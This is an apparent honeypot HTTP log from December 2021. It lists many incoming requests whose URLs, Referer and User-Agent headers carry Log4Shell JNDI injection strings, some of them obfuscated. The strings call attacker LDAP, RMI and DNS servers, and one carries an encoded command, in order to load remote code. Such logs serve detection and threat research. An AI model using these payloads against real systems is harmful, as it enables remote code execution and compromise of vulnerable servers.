    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.253:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-29 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 167.71.13.196
    URL: GET /$%7Bjndi:ldap://167.71.13.196:8444/lx-ffff2d209bbfbb0100fc6fca6100000000b535c1%7D?${jndi:
    Referer: -
    User Agent: ${jndi:ldap://167.71.13.196:8444/lx-ffff2d209bbfbb0108fc6fca6100000000a74470}

2021-12-28 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 79.143.186.150
    URL: GET /$%7Bjndi:$%7Blower:l%7D$%7Blower:d%7Da$%7Blower:p%7D://5pp1ee87e9f96874f479481.y.psc4fuel
    Referer: -
    User Agent: Mozilla/5.0

2021-12-28 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:${lower:l}${lower:d}a${lower:p}://5ppe9c1c39cce0a4032b01c.y.psc4fuel.com/5
    User Agent: Mozilla/5.0

2021-12-28 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.10:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1Lj
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.253:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.253:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.10:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1Lj
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-28 195.54.160.149
    URL: GET /login
    Referer: http://a.b.c.e:80/dashboard
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-27 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-27 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-27 162.241.69.182
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:dns://162.241.127.99:1389/a}

2021-12-27 162.241.69.182
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:dns://162.241.127.99:1389/a}

2021-12-27 162.241.114.189
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:rmi://162.241.127.99:1389/a}

2021-12-27 162.241.114.189
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:rmi://162.241.127.99:1389/a}

2021-12-27 162.241.69.182
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99:1389/a}

2021-12-27 162.241.69.182
    URL: HEAD /
    Referer: -
    User Agent: ${jndi:ldap://162.241.127.99:1389/a}

2021-12-27 195.54.160.149
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-27 195.54.160.149
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-27 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:ldap://1ppllc896032545a44629bdcf.y.psc4fuel.com/gUYOl.class}
    User Agent: Mozilla/5.0

2021-12-26 79.143.186.150
    URL: POST /$%7Bjndi:ldap://1pp46c3451bf8c34b8b875c.y.psc4fuel.com/YAo1Y.class%7D
    Referer: -
    User Agent: Mozilla/5.0

2021-12-26 79.143.186.150
    URL: GET /$%7Bjndi:ldap://1ppbdfd401c303d4665a4bf.y.psc4fuel.com/Us5sj.class%7D
    Referer: -
    User Agent: Mozilla/5.0

2021-12-26 79.143.186.150
    URL: POST /
    Referer: https://google.com/${jndi:ldap://1pp4d4dfdbb98f646c58194.y.psc4fuel.com/MoUcz.class}
    User Agent: Mozilla/5.0

2021-12-26 195.54.160.149
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 195.54.160.149
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 195.54.160.149
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 79.143.186.150
    URL: GET /$%7Bjndi:ldap://1pp488995fac87645adb0db.y.psc4fuel.com/xEJiZ.class%7D
    Referer: https://google.com/${jndi:ldap://1pp488995fac87645adb0db.y.psc4fuel.com/xEJiZ.class}
    User Agent: Mozilla/5.0

2021-12-26 79.143.186.150
    URL: GET /$%7Bjndi:ldap://1ppb78fece6dd024937a907.y.psc4fuel.com/x6ftI.class%7D
    Referer: https://google.com/${jndi:ldap://1ppb78fece6dd024937a907.y.psc4fuel.com/x6ftI.class}
    User Agent: Mozilla/5.0

2021-12-26 79.143.186.150
    URL: GET /$%7Bjndi:ldap://1pp1568584409ea4653a6dc.y.psc4fuel.com/PD0TQ.class%7D
    Referer: https://google.com/${jndi:ldap://1pp1568584409ea4653a6dc.y.psc4fuel.com/PD0TQ.class}
    User Agent: Mozilla/5.0

2021-12-26 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:ldap://1pp257939818d9c4920bb8c.y.psc4fuel.com/tmXOO.class}
    User Agent: Mozilla/5.0

2021-12-26 79.143.186.150
    URL: GET /
    Referer: https://google.com/${jndi:ldap://1pp7e29d1857c244b50bac3.y.psc4fuel.com/MWL0S.class}
    User Agent: Mozilla/5.0

2021-12-26 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.253:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.10:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1Lj
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.253:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-26 5.2.70.192
    URL: GET /search=$%7B$%7Benv:x:-j%7Dndi$%7Benv:y:-:%7D$%7Benv:z:-l%7Ddap$%7Benv:3:-:%7D//tar.homeca
    Referer: ${${env:x:-j}ndi${env:y:-:}${env:z:-l}dap${env:3:-:}//tar.homecare888.com:1389/sshd-honeypot1}
    User Agent: ${${env:x:-j}ndi${env:y:-:}${env:z:-l}dap${env:3:-:}//tar.homecare888.com:1389/sshd-honeypot1}

2021-12-26 185.220.103.113
    URL: GET /q=$%7Bjndi:ldap://tar.homecare888.com:1389/sshd-honeypot1%7D
    Referer: ${jndi:ldap://tar.homecare888.com:1389/sshd-honeypot1}
    User Agent: ${jndi:ldap://tar.homecare888.com:1389/sshd-honeypot1}

2021-12-26 185.220.103.113
    URL: GET /q=$%7Bjndi:ldap://tar.homecare888.com:1389/sshd-honeypot1%7D
    Referer: ${jndi:ldap://tar.homecare888.com:1389/sshd-honeypot1}
    User Agent: ${jndi:ldap://tar.homecare888.com:1389/sshd-honeypot1}

2021-12-26 185.220.103.113
    URL: GET /s=$%7B$%7B::-j%7D$%7B::-n%7D$%7B::-d%7D$%7B::-i%7D:$%7B::-l%7D$%7B::-d%7D$%7B::-a%7D$%7B:
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://tar.homecare888.com:1389/sshd-honeypot
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://tar.homecare888.com:1389/sshd-honeypot

2021-12-26 185.220.103.113
    URL: GET /s=$%7B$%7B::-j%7D$%7B::-n%7D$%7B::-d%7D$%7B::-i%7D:$%7B::-l%7D$%7B::-d%7D$%7B::-a%7D$%7B:
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://tar.homecare888.com:1389/sshd-honeypot
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://tar.homecare888.com:1389/sshd-honeypot

2021-12-26 185.220.103.113
    URL: GET /
    Referer: ${${env:O:-j}ndi${env:1:-:}${env:2:-l}dap${env:3:-:}//tar.homecare888.com:1389/sshd-honeypot1}
    User Agent: ${${env:O:-j}ndi${env:1:-:}${env:2:-l}dap${env:3:-:}//tar.homecare888.com:1389/sshd-honeypot1}

2021-12-26 185.220.103.113
    URL: GET /
    Referer: ${${env:O:-j}ndi${env:1:-:}${env:2:-l}dap${env:3:-:}//tar.homecare888.com:1389/sshd-honeypot1}
    User Agent: ${${env:O:-j}ndi${env:1:-:}${env:2:-l}dap${env:3:-:}//tar.homecare888.com:1389/sshd-honeypot1}

2021-12-25 195.54.160.149
    URL: GET /login
    Referer: http://a.b.c.e:80/dashboard
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 167.71.13.196
    URL: GET /$%7Bjndi:ldap://167.71.13.196:8444/lx-ffff5fb3c8f7bb0100032ec76100000000e09a89%7D?${jndi:
    Referer: -
    User Agent: ${jndi:ldap://167.71.13.196:8444/lx-ffff5fb3c8f7bb0108032ec76100000000d9ac03}

2021-12-25 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.253:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.168:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1L
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.10:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1Lj
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-25 195.54.160.149
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

021-12-25 195.54.160.149
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-24 207.180.254.177
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Bupper%3An%7D%24%7Blower%3Ad%7D%24%7Bupper%3Ai%7D%3A%24%7
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}

2021-12-24 207.180.254.177
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Bupper%3An%7D%24%7Blower%3Ad%7D%24%7Bupper%3Ai%7D%3A%24%7
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}

2021-12-24 207.180.254.177
    URL: GET /
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}

2021-12-24 207.180.254.177
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.2
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-24 207.180.254.177
    URL: GET /
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}

2021-12-24 207.180.254.177
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-24 207.180.254.177
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.2
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-24 207.180.254.177
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-24 141.164.57.242
    URL: GET /?v=%24%7Bjndi%3Aldap%3A%2F%2Fsshd-honeypot6.55173ov012g148um8033t642s25b2l83f.interact.sh
    Referer: https://${jndi:ldap://sshd-honeypot6.55173ov012g148um8033t642s25b2l83f.interact.sh/bgvl4ih}
    User Agent: ${jndi:ldap://sshd-honeypot6.55173ov012g148um8033t642s25b2l83f.interact.sh/bgvl4ih}

2021-12-24 51.68.141.164
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D
    Referer: ${jndi:ldap://144.202.34.169:1389/#Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/#Binary}

2021-12-24 51.68.141.164
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D
    Referer: ${jndi:ldap://144.202.34.169:1389/#Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/#Binary}

2021-12-24 51.68.141.164
    URL: GET /
    Referer: ${jndi:ldap://144.202.34.169:1389/#Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/#Binary}

2021-12-24 51.68.141.164
    URL: GET /
    Referer: ${jndi:ldap://144.202.34.169:1389/#Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/#Binary}

2021-12-24 51.68.141.164
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D
    Referer: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}

2021-12-24 51.68.141.164
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D
    Referer: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}

2021-12-24 51.68.141.164
    URL: GET /
    Referer: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}

2021-12-24 51.68.141.164
    URL: GET /
    Referer: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}

2021-12-24 80.163.26.100
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.2
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/Binary}

2021-12-24 80.163.26.100
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/Binary}

2021-12-24 80.163.26.100
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.2
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/Binary}

2021-12-24 80.163.26.100
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/Binary}

2021-12-24 80.163.26.100
